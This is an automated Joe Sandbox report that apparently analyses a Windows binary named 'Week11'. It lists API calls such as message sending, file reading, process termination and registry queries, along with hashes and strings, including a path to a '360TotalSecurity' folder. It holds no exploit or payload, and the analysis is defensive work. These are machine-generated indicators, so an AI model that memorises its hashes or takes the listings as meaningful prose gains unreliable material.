                                • Opcode ID: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
                                • Instruction ID: cb96d1c1a344abd5dc9de915a8941917d73025fba777b5d6defc882ec8901fa7
                                • Opcode Fuzzy Hash: d644d26533df63c07920f3f1add73790a58ed87c7a85fd8761546efb72eea84e
                                • Instruction Fuzzy Hash: 6C41E3B1C00248ABEF10EBE4DC85AEEBBB8EF05314F14462EF51177281DB785A05C769
                                APIs
                                • SendMessageW.USER32(?,0000113E,00000000,0000F000), ref: 0046E449
                                • SendMessageW.USER32(?,0000110A,00000003,00000201), ref: 0046E4B7
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E4CE
                                • SendMessageW.USER32(?,0000113F,00000000,00000018), ref: 0046E529
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
                                • Instruction ID: 0a50794e182766536891548859ddcfcf6837cfdc01b685d1ec99ee1c727b3b10
                                • Opcode Fuzzy Hash: 3b6afa3a41117d98efad31a765cd4e3ee3e6e1137afb1f88c374c91f222d183b
                                • Instruction Fuzzy Hash: DA414C74A00219AFDB14DFAAD881EAEB7F8FF08314F10815AE915A7345EB34ED41CB95
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042403C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424053
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 0042408F
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424113
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
                                • Instruction ID: d2cc8af1bf16ca7be1f00f3773d7ad9c581c7ccd4ca93e8ee6db63fee2bc6e33
                                • Opcode Fuzzy Hash: 2bafe50b4cd16e6c0fce3f4730de0bcb0bdcb025c6a603726646db373566b17d
                                • Instruction Fuzzy Hash: 2C3192B0E00229AFDB10DF95D9854BEFBF8FF84705B50855AE915A3200D3386A91CBE4
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042415C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424173
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004241AF
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424226
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
                                • Instruction ID: 0ee44c7dda0063b873c49ff7400baac87b7ce386fedb679ffbc5797c76a402e2
                                • Opcode Fuzzy Hash: af0e90832f511d133f729884774fc1196cdbb22133e22969916b00618cc79a5f
                                • Instruction Fuzzy Hash: D131E770A00236EFDB14DE96ECC44BEF7B4EB94304B50866BE425D7641C23CA991DBE9
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042427C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 00424293
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,?), ref: 004242CF
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 00424344
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
                                • Instruction ID: 4e1e74171ca53cadc9a258f722f4827c3c999a49b092120ff199828192a2837b
                                • Opcode Fuzzy Hash: d76ab6ec8e24807569e73e388baa743526c80a1cb931ad595a7ba3babf8b5fd4
                                • Instruction Fuzzy Hash: 6931B871E00536AF9B04DFE6D8C04BFFBB4EE85341B10865EE815A3640D2385945CBF4
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0042A5DA
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0042A5EA
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0042A622
                                • CloseHandle.KERNEL32(00000000), ref: 0042A634
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
                                • Instruction ID: f76ff96595e95f74c71594774e9d732ce93bf559fa4622e3cdbde4d7c9f374e5
                                • Opcode Fuzzy Hash: e7a6ba72f83ff74a2867d1e2b198b241d2b6449d0a3b992f5f863392b97e59b6
                                • Instruction Fuzzy Hash: 7911B4317822247BDB219E14AC45FAB776CAF42B10F08029AFC44A7380DBB49D16C7E9
                                APIs
                                Similarity
                                • API ID: __recalloc_memmove_s
                                • String ID:
                                • API String ID: 1992126439-0
                                • Opcode ID: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
                                • Instruction ID: 67bfe94639931a2a40ca0e4519d54b2eabdb7bb960d7e8c4135de81b3624f322
                                • Opcode Fuzzy Hash: 2db8bd80f64b054a3897fb89b493a91a79f165c39cd341f9c69927f25a41de60
                                • Instruction Fuzzy Hash: 2D1184B6600B026FE720CE69DD84A6BB3E6EBD4304714CA1EE596C7744EB35E941C750
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00444751
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00444774
                                • TranslateMessage.USER32(?), ref: 00444791
                                • DispatchMessageW.USER32(?), ref: 00444798
                                Similarity
                                • API ID: Message$DispatchPeekTranslate
                                • String ID:
                                • API String ID: 4217535847-0
                                • Opcode ID: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
                                • Instruction ID: 0fac7e69ba9ad83552e9d8b8551bd64ae53e41f683b0e31269322f83ec5c5c78
                                • Opcode Fuzzy Hash: 6eed07a1de137a343f16607f55210179fe37b4095c5723a1a21d86fe1cafc308
                                • Instruction Fuzzy Hash: 93117030301605ABF7219B58CD89BBBB3ADEF86744F244227E605D72D0D768ED13869D
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E316
                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0046E324
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046E34C
                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 0046E365
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
                                • Instruction ID: 92d63199bf3ba3bd1b39ea87b3f604ecff6bdd8f92319aed1bb14121758a28bc
                                • Opcode Fuzzy Hash: ecf94a62f26eeacc0b3ac7c39fde8e4ec8b901517570cba37ac92dc8c8cd249a
                                • Instruction Fuzzy Hash: 11019672A4021867DB24DA6D9C81FEBB7ECDF98B21F044156FA04AF384D5E5DC4087A4
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3A2
                                • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0046E3C3
                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046E3F1
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0046E3FF
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
                                • Instruction ID: a8aca7fbe68f332f40261ef60b8dbba9274b1c905ece51679bbb8e48558e1265
                                • Opcode Fuzzy Hash: 7d47e92251a524073868a7c109d101777243e95e9591a6cadf10de374a7af106
                                • Instruction Fuzzy Hash: 2C118275A003186BEB10DFA9DC85EDABBECAF58750F008115FA04AB280D6B4D9018BA4
                                APIs
                                • _memset.LIBCMT ref: 0046E029
                                • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 0046E040
                                • PathAddBackslashW.SHLWAPI(?), ref: 0046E051
                                • _wcsnlen.LIBCMT ref: 0046E063
                                Similarity
                                • API ID: Path$BackslashFolder_memset_wcsnlen
                                • String ID:
                                • API String ID: 355466527-0
                                • Opcode ID: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
                                • Instruction ID: c3c8c16ad6002ca8db4496610c8fa53d1dc55c311b100ebd92f6ba53468d5b16
                                • Opcode Fuzzy Hash: 7a33fdecb9513258b2daa65a6f1328a7f924869bcfe40f651878746a35876be4
                                • Instruction Fuzzy Hash: B4014875A4031C67EB20DB719C46FEF73B89B14700F50099EB705962C1E6F4AA848B9D
                                APIs
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                • Instruction ID: 2b3d422230432c192b45f569dd11a878a4019c89b8cafb0b6d0be2bf1e6fd384
                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                • Instruction Fuzzy Hash: BF11837204014EFBCF129EC6DC01CEE3F22BB18368B598426FE1859131D63ACA71AB85
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 004866E2
                                • GetTopWindow.USER32(00000000), ref: 004866F5
                                  • Part of subcall function 004866D5: GetWindow.USER32(00000000,00000002), ref: 0048673C
                                • GetTopWindow.USER32(?), ref: 00486725
                                Similarity
                                • API ID: Window$Item
                                • String ID:
                                • API String ID: 369458955-0
                                • Opcode ID: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
                                • Instruction ID: 1c32d4620a6206c68789083f241b8cf28c369af0658d722bbae67bfb0c664882
                                • Opcode Fuzzy Hash: 68d7a8da34205e048657e9c06a100d379f07f8b96ddc92c88d742dd533d4e848
                                • Instruction Fuzzy Hash: 09014F3200162AB7DF633F668C09E9F3A59AF543A8F06492AFD1455210DB39C911DBED
                                APIs
                                • OpenProcess.KERNEL32(00000001,00000000,00000000,0040140D,00401337), ref: 0047AA8E
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047AAA2
                                • CloseHandle.KERNEL32(00000000), ref: 0047AAAD
                                Similarity
                                • API ID: Process$CloseHandleOpenTerminate
                                • String ID:
                                • API String ID: 2026632969-0
                                • Opcode ID: 07baf951e1c1d32a9b289b9a63a86d629f90816581076803e4e0c2f07b621e7c
                                • Instruction ID: e32e3ce7148e40f4c7755fa9f2131d3cb9b82d0eb1932f3404be977840ee2a0e
                                • Opcode Fuzzy Hash: 07baf951e1c1d32a9b289b9a63a86d629f90816581076803e4e0c2f07b621e7c
                                • Instruction Fuzzy Hash: 9FE04F354022306BDA2027387D0DBEF37885B46BB1F155351FD26962E08B55489BD6AA
                                APIs
                                Strings
                                Similarity
                                • API ID: ClearVariant
                                • String ID: tip:$xK
                                • API String ID: 1473721057-3914292583
                                • Opcode ID: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
                                • Instruction ID: c63cff6a0237a891473ee878d2458deaf71263266a40017f2bb62b9b39f3b64e
                                • Opcode Fuzzy Hash: cfe65434e61dabe73e7bdbfde77a0d517a24546f6981b8ce282e4c2b2f3a59fd
                                • Instruction Fuzzy Hash: 0102C371B00119DFDB00DFA9C880BEEB7B5AF99314F64815DE514AB391CB39AE05CBA4
                                Strings
                                Similarity
                                • API ID:
                                • String ID: AXWIN
                                • API String ID: 0-1948516679
                                • Opcode ID: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
                                • Instruction ID: 44e0a74f98a3ad07866d65f659633ba2282cdbadd91c1263810b1026f8ecc6a9
                                • Opcode Fuzzy Hash: 758e0e0f1fe1718a73692213017736f8edb31cdad68be6d343334c2c001d2bc1
                                • Instruction Fuzzy Hash: E6020574600705AFEB14DFA8C880F6BB7A9FF89304F20895DEA699B390D775E911CB50
                                APIs
                                  • Part of subcall function 0044C640: std::_Lockit::_Lockit.LIBCPMT ref: 0044C651
                                  • Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D36C
                                  • Part of subcall function 0045D340: std::_Lockit::_Lockit.LIBCPMT ref: 0045D38F
                                  • Part of subcall function 0044BC60: std::_Lockit::_Lockit.LIBCPMT ref: 0044BC70
                                • _localeconv.LIBCMT ref: 0045A8E1
                                • _strcspn.LIBCMT ref: 0045A9FC
                                Strings
                                Similarity
                                • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                • String ID: e
                                • API String ID: 331173946-4024072794
                                • Opcode ID: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
                                • Instruction ID: 460df75306ccaae4a8be6dae26e504ebc6c158edf0c799e3b896ceea4de7fa7d
                                • Opcode Fuzzy Hash: 365ca3d9b6c8385756e30168abca7fc9ce130e11c21cb565a6444df39ee1151e
                                • Instruction Fuzzy Hash: D3028E71A002489FCB04DF99C980ADEBBF5EF8D304F15826AF809AB352D734AD45CB95
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0045242C
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00452493
                                  • Part of subcall function 004A7F61: std::ios_base::_Tidy.LIBCPMT ref: 004A7F86
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: std::ios_base::_$Ios_base_dtor$Tidy
                                • String ID: ' is not a number.
                                • API String ID: 1660919132-698141950
                                • Opcode ID: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
                                • Instruction ID: 127e038c3c670db67ceb8761e47593868cba54f79e17a5f4c7929c39934a4a58
                                • Opcode Fuzzy Hash: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
                                • Instruction Fuzzy Hash: 8B6181B1D002589FCB10DFA9C941BDDFBB4AF19304F14816FE90967242D7B89A48CBA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %$+
                                • API String ID: 233258989-2626897407
                                • Opcode ID: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
                                • Instruction ID: ca216fb2ccd0806d6bb8efb6b476fbe039f35d0fd5b0fbaa41d4beba8469aabd
                                • Opcode Fuzzy Hash: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
                                • Instruction Fuzzy Hash: BC518C73E043005AD715AA18CC847DB7BE4EB45382F30195EED81A3393EE6D88498BCE
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %$+
                                • API String ID: 233258989-2626897407
                                • Opcode ID: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
                                • Instruction ID: 229c02cc651a8cb155adca296aef01cde620da0f872926c806c2b37376d29a85
                                • Opcode Fuzzy Hash: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
                                • Instruction Fuzzy Hash: 0E516FB2A083409BD7159A18C8847EB7BE4FB45341F20495EFD81A3393EF6D8C49879B
                                APIs
                                • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00462334
                                • PostMessageW.USER32(00000000,00000403,00000000,00000000), ref: 0046234E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: T9N
                                • API String ID: 410705778-185908819
                                • Opcode ID: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
                                • Instruction ID: e620361aaaec6b45d06e3cf0956ed295eeddacf8bf0858373358f6c422f466ef
                                • Opcode Fuzzy Hash: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
                                • Instruction Fuzzy Hash: 97419EB1600A04AFD714CF69CC91F5AB3A4FB85320F10876EE9259B3E1E775E901CB98
                                APIs
                                • _memset.LIBCMT ref: 0047C0B1
                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,1D1D1D8C), ref: 0047C0C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FolderPath_memset
                                • String ID: \360TotalSecurity
                                • API String ID: 3318179493-2332581644
                                • Opcode ID: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
                                • Instruction ID: 33d1853786ce610a4019087d8bcb722d3f345c4a8efe477e8a07a1bb4625ea7b
                                • Opcode Fuzzy Hash: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
                                • Instruction Fuzzy Hash: D131A4B16143409BD310EF25D8C5BABB7E9EF88714F80493FF44997291DB3C99048B9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _wcsrchr
                                • String ID: T9N$T9N
                                • API String ID: 1752292252-1430650303
                                • Opcode ID: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
                                • Instruction ID: 3907a6aad81c414dc0ec16ccaffdfb23846f3fb0f01909b07169201c7ac1546f
                                • Opcode Fuzzy Hash: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
                                • Instruction Fuzzy Hash: F33173B1A00605AFDB00DF6DCC41B9EF7E5EF94320F15866AE814DB392DB759A008B95
                                APIs
                                • _malloc.LIBCMT ref: 0044E754
                                  • Part of subcall function 0044E9D0: __CxxThrowException@8.LIBCMT ref: 0044E9F0
                                Strings
                                • in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 0044E724
                                • in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 0044E764
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throw_malloc
                                • String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
                                • API String ID: 3476970888-1516562270
                                • Opcode ID: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
                                • Instruction ID: 6f7c2c4555c5b928909773d5385ec3f0d00b2ad257d6945f7a4d35fc53a13465
                                • Opcode Fuzzy Hash: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
                                • Instruction Fuzzy Hash: 0821C271D14208ABDB10EFA5C881FDEB7FCEB09714F10416FE855A3281D77866088BB5
                                APIs
                                • _memset.LIBCMT ref: 0046C92C
                                • SHGetFileInfoW.SHELL32(dummy,00000010,00000000,000002B4,00000111), ref: 0046C94C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileInfo_memset
                                • String ID: dummy
                                • API String ID: 2638500827-1341452863
                                • Opcode ID: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
                                • Instruction ID: 34207cb54232210df3e410c3426895dd0293e4b59b264748dbbebd727176387b
                                • Opcode Fuzzy Hash: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
                                • Instruction Fuzzy Hash: 7F11A770A0030CABDF50EF64DC46BAE73E49B05304F40459EE90D9B382EB756A18DF59
                                APIs
                                • __wcsnicmp.LIBCMT ref: 0047C266
                                • GetCurrentProcessId.KERNEL32(1D1D1D8C,?,?,?), ref: 0047C272
                                  • Part of subcall function 0047C190: RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
                                  • Part of subcall function 0047C190: RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
                                  • Part of subcall function 0047C190: RegCloseKey.ADVAPI32 ref: 0047C1EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue__wcsnicmp
                                • String ID: PrN
                                • API String ID: 4025261707-529563713
                                • Opcode ID: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
                                • Instruction ID: 06d61b6dee211bcea7aa0e6dc66a31dceec7f1586715560bfa64037558db7496
                                • Opcode Fuzzy Hash: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
